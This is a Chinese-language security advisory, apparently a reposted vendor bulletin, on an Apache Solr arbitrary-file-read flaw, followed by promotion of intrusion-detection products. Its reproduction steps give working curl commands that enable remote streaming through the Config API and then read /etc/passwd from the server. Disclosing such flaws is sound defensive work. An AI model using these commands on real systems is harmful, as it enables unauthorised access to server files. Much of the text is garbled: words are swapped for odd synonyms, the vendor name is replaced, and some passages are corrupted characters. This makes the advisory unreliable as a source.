您订阅的产品有更新,请实时查阅
审查详情
宣布时间:2021-03-21
克日,97国际网络清静应急团队检测到Apache Solr保存恣意文件读取误差,攻击者可以结构恶意的HTTP请求,对目的服务器上恣意文件举行读取。
Apache Solr是一个开源搜索服务引擎,Solr 使用 Java 语言开发,主要基于 HTTP 和 Apache Lucene 实现。Apace Solr普遍应用于一些大型门户网站、电子商务网站等都需要站内搜索功效的场景,多安排于公司内网,公网使用量也抵达1万多。
影响规模
Apache Solr全版本。
威胁品级
高
POC状态
目今误差POC已果真
误差说明
误差使用需要两步,首先使用Config API翻开默认关闭的requestDispatcher.requestParsers.enableRemoteStreaming开关,然后举行文件读取。
值得注重的是,默认情形下requestDispatcher.requestParsers.enableRemoteStreaming是关闭,攻击者并不可举行恣意文件读取。以是官方并不以为这是一个误差,可是从攻击者角度来说可以通过Solr提供的Config API远程翻开此开关,然后举行攻击,且Apache Solr生产情形下大多坚持默认设置,并无身份校验。
误差复现
1.会见 Solr Admin 管理员页面

2.获取core的信息
http://xxx.xxx.xxx.xxx/solr/admin/cores?indexInfo=false&wt=json

3.接纳如下POC:修改设置
curl -d '{ "set-property" : {"requestDispatcher.requestParsers.enableRemoteStreaming":true}}'http://xxx.xxx.xxx.xxx:8983/solr/fd_20201221/config -H 'Content-type:application/json'

4. 接纳如下poc获取文件内容
curl "http://xxx.xxx.xxx.xxx:8983/solr/ fd_20201221/debug/dump?param=ContentStreams" -F "stream.url=file://etc/passwd"

修复建议
因厂商体现暂不修复,97国际网络清静专家建议直接将solr放内网,以免造成文件信息泄露。
产品解决计划
RG-IDP系列入侵检测防御系统
RG-IDP系列入侵检测防御系统是97国际推出的将深度内容检测、清静防护、上网行为管理等手艺团结的入侵检测防御系统装备。通过对网络中深层攻击行为举行准确的剖析判断,自动有用的�;ね缜寰�。RG-IDP系统入侵检测防御系统已支持对该误差的检测。
RG-WG系列WebGuard应用�;は低�
97国际RG-WG WebGuard应用�;は低�,通过对收支Web服务器的HTTP/HTTPS流量相关内容的实时剖析检测、过滤,来准确判断并阻止种种Web应用入侵行为,阻断对Web服务器的恶意会见与不法操作。RG-WG系列WebGuard应用�;は低骋阎С侄愿梦蟛畹募觳�。
团队先容
97国际网络CERT清静应急响应团队,跟踪最新互联网威胁事务,针对最新清静误差,APT攻击以及僵尸网络家族做实时跟踪和剖析;为产品、客户提供实时、有用的清静防护战略与解决计划。

97国际“网络+清静”主张将网络装备的清静能力充分验展,网络装备、清静装备与清静平台智能联动,离别清静孤岛,组成整网联动的清静包管系统,实现防护、清静展望、剖析和响应等清静问题自动化全流程闭环。

如您需要97国际清静,请留下您的联系方法
